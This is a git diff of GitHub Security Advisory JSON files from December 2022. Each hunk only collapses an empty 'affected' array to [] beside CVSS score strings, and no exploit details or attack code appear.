a/advisories/unreviewed/2022/12/GHSA-23fv-pj9m-qvh4/GHSA-23fv-pj9m-qvh4.json b/advisories/unreviewed/2022/12/GHSA-23fv-pj9m-qvh4/GHSA-23fv-pj9m-qvh4.json index 56ce997d767..716071dc1c3 100644 --- a/advisories/unreviewed/2022/12/GHSA-23fv-pj9m-qvh4/GHSA-23fv-pj9m-qvh4.json +++ b/advisories/unreviewed/2022/12/GHSA-23fv-pj9m-qvh4/GHSA-23fv-pj9m-qvh4.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/12/GHSA-26j2-2wp8-h95h/GHSA-26j2-2wp8-h95h.json b/advisories/unreviewed/2022/12/GHSA-26j2-2wp8-h95h/GHSA-26j2-2wp8-h95h.json index 66c59ccce29..1c5a08879c4 100644 --- a/advisories/unreviewed/2022/12/GHSA-26j2-2wp8-h95h/GHSA-26j2-2wp8-h95h.json +++ b/advisories/unreviewed/2022/12/GHSA-26j2-2wp8-h95h/GHSA-26j2-2wp8-h95h.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/12/GHSA-26rq-fvc6-cmqf/GHSA-26rq-fvc6-cmqf.json b/advisories/unreviewed/2022/12/GHSA-26rq-fvc6-cmqf/GHSA-26rq-fvc6-cmqf.json index d2b7158e300..0c2bf2c2493 100644 --- a/advisories/unreviewed/2022/12/GHSA-26rq-fvc6-cmqf/GHSA-26rq-fvc6-cmqf.json +++ b/advisories/unreviewed/2022/12/GHSA-26rq-fvc6-cmqf/GHSA-26rq-fvc6-cmqf.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/12/GHSA-2hgm-fhfg-mc3p/GHSA-2hgm-fhfg-mc3p.json b/advisories/unreviewed/2022/12/GHSA-2hgm-fhfg-mc3p/GHSA-2hgm-fhfg-mc3p.json index fac95dc8ac4..45fc3eb1453 100644 --- a/advisories/unreviewed/2022/12/GHSA-2hgm-fhfg-mc3p/GHSA-2hgm-fhfg-mc3p.json +++ b/advisories/unreviewed/2022/12/GHSA-2hgm-fhfg-mc3p/GHSA-2hgm-fhfg-mc3p.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/12/GHSA-2mq6-r48x-9jhh/GHSA-2mq6-r48x-9jhh.json b/advisories/unreviewed/2022/12/GHSA-2mq6-r48x-9jhh/GHSA-2mq6-r48x-9jhh.json index f12f7a72121..d97b2afeb1a 100644 --- a/advisories/unreviewed/2022/12/GHSA-2mq6-r48x-9jhh/GHSA-2mq6-r48x-9jhh.json +++ b/advisories/unreviewed/2022/12/GHSA-2mq6-r48x-9jhh/GHSA-2mq6-r48x-9jhh.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/12/GHSA-2pg5-pjg8-qgpg/GHSA-2pg5-pjg8-qgpg.json b/advisories/unreviewed/2022/12/GHSA-2pg5-pjg8-qgpg/GHSA-2pg5-pjg8-qgpg.json index d988081e3de..25c8f9579c1 100644 --- a/advisories/unreviewed/2022/12/GHSA-2pg5-pjg8-qgpg/GHSA-2pg5-pjg8-qgpg.json +++ b/advisories/unreviewed/2022/12/GHSA-2pg5-pjg8-qgpg/GHSA-2pg5-pjg8-qgpg.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/12/GHSA-2rg4-rjm2-69pg/GHSA-2rg4-rjm2-69pg.json b/advisories/unreviewed/2022/12/GHSA-2rg4-rjm2-69pg/GHSA-2rg4-rjm2-69pg.json index 9ef7491a374..2e0bb3e9292 100644 --- a/advisories/unreviewed/2022/12/GHSA-2rg4-rjm2-69pg/GHSA-2rg4-rjm2-69pg.json +++ b/advisories/unreviewed/2022/12/GHSA-2rg4-rjm2-69pg/GHSA-2rg4-rjm2-69pg.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/12/GHSA-2w4p-mxxg-4x58/GHSA-2w4p-mxxg-4x58.json b/advisories/unreviewed/2022/12/GHSA-2w4p-mxxg-4x58/GHSA-2w4p-mxxg-4x58.json index caf20f28dee..d3fabcf0348 100644 --- a/advisories/unreviewed/2022/12/GHSA-2w4p-mxxg-4x58/GHSA-2w4p-mxxg-4x58.json +++ b/advisories/unreviewed/2022/12/GHSA-2w4p-mxxg-4x58/GHSA-2w4p-mxxg-4x58.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/12/GHSA-2whj-hwg6-5rg8/GHSA-2whj-hwg6-5rg8.json b/advisories/unreviewed/2022/12/GHSA-2whj-hwg6-5rg8/GHSA-2whj-hwg6-5rg8.json index f0fad7f550a..83eab3b83a8 100644 --- a/advisories/unreviewed/2022/12/GHSA-2whj-hwg6-5rg8/GHSA-2whj-hwg6-5rg8.json +++ b/advisories/unreviewed/2022/12/GHSA-2whj-hwg6-5rg8/GHSA-2whj-hwg6-5rg8.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/12/GHSA-39jw-wwg8-h68q/GHSA-39jw-wwg8-h68q.json b/advisories/unreviewed/2022/12/GHSA-39jw-wwg8-h68q/GHSA-39jw-wwg8-h68q.json index 004cbe940dc..aa452bc6d1a 100644 --- a/advisories/unreviewed/2022/12/GHSA-39jw-wwg8-h68q/GHSA-39jw-wwg8-h68q.json +++ b/advisories/unreviewed/2022/12/GHSA-39jw-wwg8-h68q/GHSA-39jw-wwg8-h68q.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/12/GHSA-3r5j-phw6-cxph/GHSA-3r5j-phw6-cxph.json b/advisories/unreviewed/2022/12/GHSA-3r5j-phw6-cxph/GHSA-3r5j-phw6-cxph.json index 56a7d4e0f68..d5edbacec39 100644 --- a/advisories/unreviewed/2022/12/GHSA-3r5j-phw6-cxph/GHSA-3r5j-phw6-cxph.json +++ b/advisories/unreviewed/2022/12/GHSA-3r5j-phw6-cxph/GHSA-3r5j-phw6-cxph.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/12/GHSA-449v-vvpj-5rqh/GHSA-449v-vvpj-5rqh.json b/advisories/unreviewed/2022/12/GHSA-449v-vvpj-5rqh/GHSA-449v-vvpj-5rqh.json index 2cb7cdf0556..8c7eac053cc 100644 --- a/advisories/unreviewed/2022/12/GHSA-449v-vvpj-5rqh/GHSA-449v-vvpj-5rqh.json +++ b/advisories/unreviewed/2022/12/GHSA-449v-vvpj-5rqh/GHSA-449v-vvpj-5rqh.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/12/GHSA-473f-jhpf-p3fw/GHSA-473f-jhpf-p3fw.json b/advisories/unreviewed/2022/12/GHSA-473f-jhpf-p3fw/GHSA-473f-jhpf-p3fw.json index 3707ac1e592..b05b92248b1 100644 --- a/advisories/unreviewed/2022/12/GHSA-473f-jhpf-p3fw/GHSA-473f-jhpf-p3fw.json +++ b/advisories/unreviewed/2022/12/GHSA-473f-jhpf-p3fw/GHSA-473f-jhpf-p3fw.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/12/GHSA-4gjp-4vwr-87x3/GHSA-4gjp-4vwr-87x3.json b/advisories/unreviewed/2022/12/GHSA-4gjp-4vwr-87x3/GHSA-4gjp-4vwr-87x3.json index 515484d6bcf..d8d26ea4c0e 100644 --- a/advisories/unreviewed/2022/12/GHSA-4gjp-4vwr-87x3/GHSA-4gjp-4vwr-87x3.json +++ b/advisories/unreviewed/2022/12/GHSA-4gjp-4vwr-87x3/GHSA-4gjp-4vwr-87x3.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/12/GHSA-4rm9-7435-8cv9/GHSA-4rm9-7435-8cv9.json b/advisories/unreviewed/2022/12/GHSA-4rm9-7435-8cv9/GHSA-4rm9-7435-8cv9.json index 9a07f122359..4c50ca06d2d 100644 --- a/advisories/unreviewed/2022/12/GHSA-4rm9-7435-8cv9/GHSA-4rm9-7435-8cv9.json +++ b/advisories/unreviewed/2022/12/GHSA-4rm9-7435-8cv9/GHSA-4rm9-7435-8cv9.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/12/GHSA-4x9h-3vqq-2hx5/GHSA-4x9h-3vqq-2hx5.json b/advisories/unreviewed/2022/12/GHSA-4x9h-3vqq-2hx5/GHSA-4x9h-3vqq-2hx5.json index 24805f20898..558c1091e22 100644 --- a/advisories/unreviewed/2022/12/GHSA-4x9h-3vqq-2hx5/GHSA-4x9h-3vqq-2hx5.json +++ b/advisories/unreviewed/2022/12/GHSA-4x9h-3vqq-2hx5/GHSA-4x9h-3vqq-2hx5.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/12/GHSA-55cm-jv9m-hwg9/GHSA-55cm-jv9m-hwg9.json b/advisories/unreviewed/2022/12/GHSA-55cm-jv9m-hwg9/GHSA-55cm-jv9m-hwg9.json index a9a257c6bd0..26801c5b3f7 100644 --- a/advisories/unreviewed/2022/12/GHSA-55cm-jv9m-hwg9/GHSA-55cm-jv9m-hwg9.json +++ b/advisories/unreviewed/2022/12/GHSA-55cm-jv9m-hwg9/GHSA-55cm-jv9m-hwg9.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/12/GHSA-5f56-qcc2-gx2j/GHSA-5f56-qcc2-gx2j.json b/advisories/unreviewed/2022/12/GHSA-5f56-qcc2-gx2j/GHSA-5f56-qcc2-gx2j.json index e18c302cf7d..2a9d8068c02 100644 --- a/advisories/unreviewed/2022/12/GHSA-5f56-qcc2-gx2j/GHSA-5f56-qcc2-gx2j.json +++ b/advisories/unreviewed/2022/12/GHSA-5f56-qcc2-gx2j/GHSA-5f56-qcc2-gx2j.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/12/GHSA-6hxg-x8pv-mvgv/GHSA-6hxg-x8pv-mvgv.json b/advisories/unreviewed/2022/12/GHSA-6hxg-x8pv-mvgv/GHSA-6hxg-x8pv-mvgv.json index 06d2290748d..616fa9fc945 100644 --- a/advisories/unreviewed/2022/12/GHSA-6hxg-x8pv-mvgv/GHSA-6hxg-x8pv-mvgv.json +++ b/advisories/unreviewed/2022/12/GHSA-6hxg-x8pv-mvgv/GHSA-6hxg-x8pv-mvgv.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/12/GHSA-6j2g-r5h9-f55v/GHSA-6j2g-r5h9-f55v.json b/advisories/unreviewed/2022/12/GHSA-6j2g-r5h9-f55v/GHSA-6j2g-r5h9-f55v.json index ed1d63eeb34..e3073fae03b 100644 --- a/advisories/unreviewed/2022/12/GHSA-6j2g-r5h9-f55v/GHSA-6j2g-r5h9-f55v.json +++ b/advisories/unreviewed/2022/12/GHSA-6j2g-r5h9-f55v/GHSA-6j2g-r5h9-f55v.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/12/GHSA-6qmr-4c46-qjhp/GHSA-6qmr-4c46-qjhp.json b/advisories/unreviewed/2022/12/GHSA-6qmr-4c46-qjhp/GHSA-6qmr-4c46-qjhp.json index ca03106e7d0..7cfa955a269 100644 --- a/advisories/unreviewed/2022/12/GHSA-6qmr-4c46-qjhp/GHSA-6qmr-4c46-qjhp.json +++ b/advisories/unreviewed/2022/12/GHSA-6qmr-4c46-qjhp/GHSA-6qmr-4c46-qjhp.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/12/GHSA-6r79-3h6c-p584/GHSA-6r79-3h6c-p584.json b/advisories/unreviewed/2022/12/GHSA-6r79-3h6c-p584/GHSA-6r79-3h6c-p584.json index 91e4cf0b3ce..49905329fb7 100644 --- a/advisories/unreviewed/2022/12/GHSA-6r79-3h6c-p584/GHSA-6r79-3h6c-p584.json +++ b/advisories/unreviewed/2022/12/GHSA-6r79-3h6c-p584/GHSA-6r79-3h6c-p584.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/12/GHSA-6xp9-xm89-r7mc/GHSA-6xp9-xm89-r7mc.json b/advisories/unreviewed/2022/12/GHSA-6xp9-xm89-r7mc/GHSA-6xp9-xm89-r7mc.json index eac06c5baeb..12cf8063b6c 100644 --- a/advisories/unreviewed/2022/12/GHSA-6xp9-xm89-r7mc/GHSA-6xp9-xm89-r7mc.json +++ b/advisories/unreviewed/2022/12/GHSA-6xp9-xm89-r7mc/GHSA-6xp9-xm89-r7mc.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/12/GHSA-74vc-g7v2-4982/GHSA-74vc-g7v2-4982.json b/advisories/unreviewed/2022/12/GHSA-74vc-g7v2-4982/GHSA-74vc-g7v2-4982.json index 1b45ff29627..85d177095e2 100644 --- a/advisories/unreviewed/2022/12/GHSA-74vc-g7v2-4982/GHSA-74vc-g7v2-4982.json +++ b/advisories/unreviewed/2022/12/GHSA-74vc-g7v2-4982/GHSA-74vc-g7v2-4982.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/12/GHSA-757x-5342-w42r/GHSA-757x-5342-w42r.json b/advisories/unreviewed/2022/12/GHSA-757x-5342-w42r/GHSA-757x-5342-w42r.json index 7a45054fc7d..4d2f30dd73a 100644 --- a/advisories/unreviewed/2022/12/GHSA-757x-5342-w42r/GHSA-757x-5342-w42r.json +++ b/advisories/unreviewed/2022/12/GHSA-757x-5342-w42r/GHSA-757x-5342-w42r.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/12/GHSA-7g66-2w5g-8v9v/GHSA-7g66-2w5g-8v9v.json b/advisories/unreviewed/2022/12/GHSA-7g66-2w5g-8v9v/GHSA-7g66-2w5g-8v9v.json index b46fc441634..2d21a48872f 100644 --- a/advisories/unreviewed/2022/12/GHSA-7g66-2w5g-8v9v/GHSA-7g66-2w5g-8v9v.json +++ b/advisories/unreviewed/2022/12/GHSA-7g66-2w5g-8v9v/GHSA-7g66-2w5g-8v9v.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/12/GHSA-7wpm-r3rw-375j/GHSA-7wpm-r3rw-375j.json b/advisories/unreviewed/2022/12/GHSA-7wpm-r3rw-375j/GHSA-7wpm-r3rw-375j.json index fb6297cfcfd..ef3c67e9fec 100644 --- a/advisories/unreviewed/2022/12/GHSA-7wpm-r3rw-375j/GHSA-7wpm-r3rw-375j.json +++ b/advisories/unreviewed/2022/12/GHSA-7wpm-r3rw-375j/GHSA-7wpm-r3rw-375j.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/12/GHSA-7wqj-6cvm-fmfh/GHSA-7wqj-6cvm-fmfh.json b/advisories/unreviewed/2022/12/GHSA-7wqj-6cvm-fmfh/GHSA-7wqj-6cvm-fmfh.json index faaa0a1811a..838c9bcfdc4 100644 --- a/advisories/unreviewed/2022/12/GHSA-7wqj-6cvm-fmfh/GHSA-7wqj-6cvm-fmfh.json +++ b/advisories/unreviewed/2022/12/GHSA-7wqj-6cvm-fmfh/GHSA-7wqj-6cvm-fmfh.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/12/GHSA-84hm-49qm-gq32/GHSA-84hm-49qm-gq32.json b/advisories/unreviewed/2022/12/GHSA-84hm-49qm-gq32/GHSA-84hm-49qm-gq32.json index 680af00bc24..8d4450be7e9 100644 --- a/advisories/unreviewed/2022/12/GHSA-84hm-49qm-gq32/GHSA-84hm-49qm-gq32.json +++ b/advisories/unreviewed/2022/12/GHSA-84hm-49qm-gq32/GHSA-84hm-49qm-gq32.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/12/GHSA-8727-g4p6-v7h7/GHSA-8727-g4p6-v7h7.json b/advisories/unreviewed/2022/12/GHSA-8727-g4p6-v7h7/GHSA-8727-g4p6-v7h7.json index c524776cb15..651ee178d6f 100644 --- a/advisories/unreviewed/2022/12/GHSA-8727-g4p6-v7h7/GHSA-8727-g4p6-v7h7.json +++ b/advisories/unreviewed/2022/12/GHSA-8727-g4p6-v7h7/GHSA-8727-g4p6-v7h7.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/12/GHSA-886q-qhgx-288q/GHSA-886q-qhgx-288q.json b/advisories/unreviewed/2022/12/GHSA-886q-qhgx-288q/GHSA-886q-qhgx-288q.json index a042f0bf60b..768013adcf5 100644 --- a/advisories/unreviewed/2022/12/GHSA-886q-qhgx-288q/GHSA-886q-qhgx-288q.json +++ b/advisories/unreviewed/2022/12/GHSA-886q-qhgx-288q/GHSA-886q-qhgx-288q.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/12/GHSA-88hh-8fwc-jjch/GHSA-88hh-8fwc-jjch.json b/advisories/unreviewed/2022/12/GHSA-88hh-8fwc-jjch/GHSA-88hh-8fwc-jjch.json index 85591b6307e..144aef4bb0e 100644 --- a/advisories/unreviewed/2022/12/GHSA-88hh-8fwc-jjch/GHSA-88hh-8fwc-jjch.json +++ b/advisories/unreviewed/2022/12/GHSA-88hh-8fwc-jjch/GHSA-88hh-8fwc-jjch.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/12/GHSA-8f7g-vmw6-89m7/GHSA-8f7g-vmw6-89m7.json b/advisories/unreviewed/2022/12/GHSA-8f7g-vmw6-89m7/GHSA-8f7g-vmw6-89m7.json index 853b265ee97..042c0720631 100644 --- a/advisories/unreviewed/2022/12/GHSA-8f7g-vmw6-89m7/GHSA-8f7g-vmw6-89m7.json +++ b/advisories/unreviewed/2022/12/GHSA-8f7g-vmw6-89m7/GHSA-8f7g-vmw6-89m7.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/12/GHSA-8jj9-3j76-6vp2/GHSA-8jj9-3j76-6vp2.json b/advisories/unreviewed/2022/12/GHSA-8jj9-3j76-6vp2/GHSA-8jj9-3j76-6vp2.json index 512269d22b4..78e548bbf87 100644 --- a/advisories/unreviewed/2022/12/GHSA-8jj9-3j76-6vp2/GHSA-8jj9-3j76-6vp2.json +++ b/advisories/unreviewed/2022/12/GHSA-8jj9-3j76-6vp2/GHSA-8jj9-3j76-6vp2.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/12/GHSA-8m8p-mfww-c2cg/GHSA-8m8p-mfww-c2cg.json b/advisories/unreviewed/2022/12/GHSA-8m8p-mfww-c2cg/GHSA-8m8p-mfww-c2cg.json index e59b7a6165b..6b3f892e312 100644 --- a/advisories/unreviewed/2022/12/GHSA-8m8p-mfww-c2cg/GHSA-8m8p-mfww-c2cg.json +++ b/advisories/unreviewed/2022/12/GHSA-8m8p-mfww-c2cg/GHSA-8m8p-mfww-c2cg.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/12/GHSA-9q4r-4j83-rq5m/GHSA-9q4r-4j83-rq5m.json b/advisories/unreviewed/2022/12/GHSA-9q4r-4j83-rq5m/GHSA-9q4r-4j83-rq5m.json index 991629d06aa..b37d1199084 100644 --- a/advisories/unreviewed/2022/12/GHSA-9q4r-4j83-rq5m/GHSA-9q4r-4j83-rq5m.json +++ b/advisories/unreviewed/2022/12/GHSA-9q4r-4j83-rq5m/GHSA-9q4r-4j83-rq5m.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/12/GHSA-c6f8-34vj-fvc3/GHSA-c6f8-34vj-fvc3.json b/advisories/unreviewed/2022/12/GHSA-c6f8-34vj-fvc3/GHSA-c6f8-34vj-fvc3.json index 70ba2f379dc..1ef62a27083 100644 --- a/advisories/unreviewed/2022/12/GHSA-c6f8-34vj-fvc3/GHSA-c6f8-34vj-fvc3.json +++ b/advisories/unreviewed/2022/12/GHSA-c6f8-34vj-fvc3/GHSA-c6f8-34vj-fvc3.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/12/GHSA-f323-5vpj-59ch/GHSA-f323-5vpj-59ch.json b/advisories/unreviewed/2022/12/GHSA-f323-5vpj-59ch/GHSA-f323-5vpj-59ch.json index 55dba800d9a..e9e6dbd6957 100644 --- a/advisories/unreviewed/2022/12/GHSA-f323-5vpj-59ch/GHSA-f323-5vpj-59ch.json +++ b/advisories/unreviewed/2022/12/GHSA-f323-5vpj-59ch/GHSA-f323-5vpj-59ch.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/12/GHSA-fg5c-ff2p-69xc/GHSA-fg5c-ff2p-69xc.json b/advisories/unreviewed/2022/12/GHSA-fg5c-ff2p-69xc/GHSA-fg5c-ff2p-69xc.json index 1e5683ee468..fbce066fadf 100644 --- a/advisories/unreviewed/2022/12/GHSA-fg5c-ff2p-69xc/GHSA-fg5c-ff2p-69xc.json +++ b/advisories/unreviewed/2022/12/GHSA-fg5c-ff2p-69xc/GHSA-fg5c-ff2p-69xc.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/12/GHSA-fhg7-w742-r4m6/GHSA-fhg7-w742-r4m6.json b/advisories/unreviewed/2022/12/GHSA-fhg7-w742-r4m6/GHSA-fhg7-w742-r4m6.json index 3a69c360dd4..2cf15eb24d0 100644 --- a/advisories/unreviewed/2022/12/GHSA-fhg7-w742-r4m6/GHSA-fhg7-w742-r4m6.json +++ b/advisories/unreviewed/2022/12/GHSA-fhg7-w742-r4m6/GHSA-fhg7-w742-r4m6.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/12/GHSA-g82r-v699-q3p8/GHSA-g82r-v699-q3p8.json b/advisories/unreviewed/2022/12/GHSA-g82r-v699-q3p8/GHSA-g82r-v699-q3p8.json index 9cbaf0081d1..211a6e77d5f 100644 --- a/advisories/unreviewed/2022/12/GHSA-g82r-v699-q3p8/GHSA-g82r-v699-q3p8.json +++ b/advisories/unreviewed/2022/12/GHSA-g82r-v699-q3p8/GHSA-g82r-v699-q3p8.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/12/GHSA-ggc2-3j9r-qm5f/GHSA-ggc2-3j9r-qm5f.json b/advisories/unreviewed/2022/12/GHSA-ggc2-3j9r-qm5f/GHSA-ggc2-3j9r-qm5f.json index cef83a3a9a4..6c42181af89 100644 --- a/advisories/unreviewed/2022/12/GHSA-ggc2-3j9r-qm5f/GHSA-ggc2-3j9r-qm5f.json +++ b/advisories/unreviewed/2022/12/GHSA-ggc2-3j9r-qm5f/GHSA-ggc2-3j9r-qm5f.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/12/GHSA-gx37-5pp8-f39c/GHSA-gx37-5pp8-f39c.json b/advisories/unreviewed/2022/12/GHSA-gx37-5pp8-f39c/GHSA-gx37-5pp8-f39c.json index fbb7e3635ce..09f5218a448 100644 --- 